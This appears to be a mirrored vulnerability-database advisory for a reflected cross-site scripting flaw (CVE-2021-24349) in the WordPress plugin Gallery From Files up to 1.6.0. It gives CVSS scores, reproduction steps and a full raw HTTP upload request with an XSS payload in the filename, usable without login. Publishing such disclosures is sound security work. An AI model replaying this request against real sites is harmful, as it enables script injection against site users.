Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitSatyender YadavWPEX-ID:6BB4EB71-D702-4732-B01F-B723077D66CA
HistoryMay 26, 2021 - 12:00 a.m.

Gallery From Files <= 1.6.0 - Reflected Cross-Site Scripting (XSS)

2021-05-2600:00:00
Satyender Yadav
288

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

JSON

This plugin gives us the functionality of uploading images to the server. But filenames are not properly sanitized before being output in an error message when they have an invalid extension, leading to a reflected Cross-Site Scripting issue. Due to the lack of CSRF check, the attack could also be performed via such vector.

Steps : 

1. Rename any file to <img src=x onerror=alert(1337)>
2. Choose this file to upload and click on the button ( upload selected file )
3. When a file is uploading you will find that an alert box popped on-screen having content "1337"

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------245018834521283925753967681812
Content-Length: 506
Cookies: [any user or even unauthenticated]
Connection: close

-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="myfile[]"; filename="<img src onerror=alert(2)>"
Content-Type: image/png


-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="action"

gallery_from_files_595_fileupload
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="filesName"

myfile
-----------------------------245018834521283925753967681812--

Related

prion 1
cnvd 1
cve 1
wpvulndb 1
prion
prion
Cross site scripting
2021-06-14 14:15:00
cnvd
cnvd
WordPress Gallery from files plugin cross-site scripting vulnerability
2021-06-15 00:00:00
cve
cve
CVE-2021-24349
2021-06-14 14:15:00
wpvulndb
wpvulndb
Gallery From Files <= 1.6.0 - Reflected Cross-Site Scripting (XSS)
2021-05-26 00:00:00

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

JSON
Related for WPEX-ID:6BB4EB71-D702-4732-B01F-B723077D66CA
prion1cnvd1cve1wpvulndb1